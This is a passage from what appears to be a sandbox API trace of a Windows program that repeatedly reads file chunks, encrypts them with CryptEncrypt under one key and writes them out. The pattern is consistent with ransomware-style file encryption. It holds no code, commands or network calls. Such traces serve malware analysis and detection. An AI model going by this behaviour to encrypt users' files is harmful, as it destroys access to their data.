hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.360] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.360] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.360] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.360] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.360] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.361] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.361] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.361] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.361] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.361] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.361] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.361] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.361] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.361] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.361] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.361] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.361] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.361] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.361] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.361] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.361] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.362] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.362] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.362] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.362] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.362] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.362] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.362] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.362] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.362] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.362] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.362] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.362] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.362] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.362] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.362] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.363] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.363] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.363] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.363] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.363] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.363] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.363] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.363] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.363] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.363] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.363] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.363] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.363] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.363] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.363] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.364] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.364] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.364] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.364] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.364] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.364] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.364] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.364] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.364] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.364] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.364] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.364] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.364] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.365] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.365] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.365] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.365] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.365] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.365] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.365] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.365] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.365] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.365] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.365] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.365] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.365] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.366] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.366] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.366] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.366] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.366] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.366] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.366] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.366] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.366] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.366] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.366] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.366] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.366] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.366] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.366] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.367] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.367] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.367] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.367] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.367] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.367] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.367] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.367] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.367] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.367] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.367] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 